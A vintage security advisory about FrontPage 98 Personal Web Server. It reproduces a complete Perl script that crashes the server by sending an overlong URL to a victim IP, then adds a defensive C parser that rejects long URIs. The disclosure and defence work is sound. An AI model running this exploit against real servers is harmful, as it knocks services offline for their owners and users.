COMMAND

    Personal Web Server

SYSTEMS AFFECTED

    FrontPage Personal Web Server

PROBLEM

    Kerb found the following.  This is a small exploit (written in
    Perl) that takes advantage of the poor URL length handling of
    FrontPage 98's Personal Web Server, which is executed when you
    open or create a "web".  The exploit will work on most machines
    with a Perl interpreter; he coded it (and tested it, of course)
    on a Windows 95 machine.

    #!/usr/bin/perl

    print <<__END_OF_HEADER;

    #########################################
    # FrontPage Fuck:                      #
    #   A small perl script designed to    #
    #   drop FrontPage 3.0.926 which is    #
    #   part of FrontPage 98 (3.0.926).    #
    #   Coded on a Win95 machine using     #
    #   a DOS breed of PERL by KerberosX.  #
    #########################################

    __END_OF_HEADER


 
    $PF_INET = 2;
    $SOCK_STREAM = 1;

    $port = 80;

    $pattern = "S n C4 x8";

    $this_addr = pack($pattern,$PF_INET,0, 0,0,0,0);

    @victim_bytes = split(/\./,$ARGV[0]);
    $serv_addr = pack($pattern,$PF_INET,$port,@victim_bytes);

    $proto = getprotobyname("tcp");

    socket(SOCK, $PF_INET, $SOCK_STREAM, $proto) ||
    die("Cannot create socket.");

    bind(SOCK, $this_addr)  ||
    die("Can't bind");

    connect(SOCK, $serv_addr) ||
    die("Cannot connect.\n");

    print SOCK "GET /" . "A" x 500 . " HTTP/1.0\n\n";

    print "Well, looks like ya phucked 'em!\n";
    close(SOCK);

SOLUTION

    Nothing yet.
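
    Added example (not from the advisory and not FrontPage's own code):
    a request-line parser in C that checks the URI length before copying
    anything and answers an overlong URI with status 414.  MAX_URI_LEN,
    the status enum and parse_request_line are names assumed for this
    example; the sample requests in main() are constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_URI_LEN 255 /* assumed limit for this example */
enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 }; /* HTTP status codes */

/* Parse "METHOD SP URI [SP VERSION]" from buf[0..len). Every length is checked
 * before any byte is copied; uri_out needs MAX_URI_LEN + 1 bytes. */
int parse_request_line(const char *buf, size_t len, char *uri_out)
{
    const char *eol = memchr(buf, '\n', len);
    if (eol == NULL)
        return REQ_BAD;              /* no complete line received */
    size_t line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r')
        line_len--;                  /* accept CRLF or bare LF */

    const char *sp1 = memchr(buf, ' ', line_len);
    if (sp1 == NULL || sp1 == buf)
        return REQ_BAD;              /* missing method */
    const char *uri = sp1 + 1;
    size_t rest = line_len - (size_t)(uri - buf);
    const char *sp2 = memchr(uri, ' ', rest);
    size_t uri_len = sp2 ? (size_t)(sp2 - uri) : rest;

    if (uri_len == 0 || uri[0] != '/')
        return REQ_BAD;
    if (uri_len > MAX_URI_LEN)
        return REQ_URI_TOO_LONG;     /* reject; never copy or silently truncate */
    if (memchr(uri, '\0', uri_len) != NULL)
        return REQ_BAD;              /* embedded NUL would hide the tail */

    memcpy(uri_out, uri, uri_len);
    uri_out[uri_len] = '\0';
    return REQ_OK;
}

int main(void)
{
    char uri[MAX_URI_LEN + 1], req[600];   /* constructed sample input */
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', 500);
    memcpy(req + 505, " HTTP/1.0\n\n", 12);
    printf("long URI:   %d\n", parse_request_line(req, 516, uri));
    const char *ok = "GET /index.htm HTTP/1.0\r\n\r\n";
    printf("normal URI: %d\n", parse_request_line(ok, strlen(ok), uri));
    return 0;
}
```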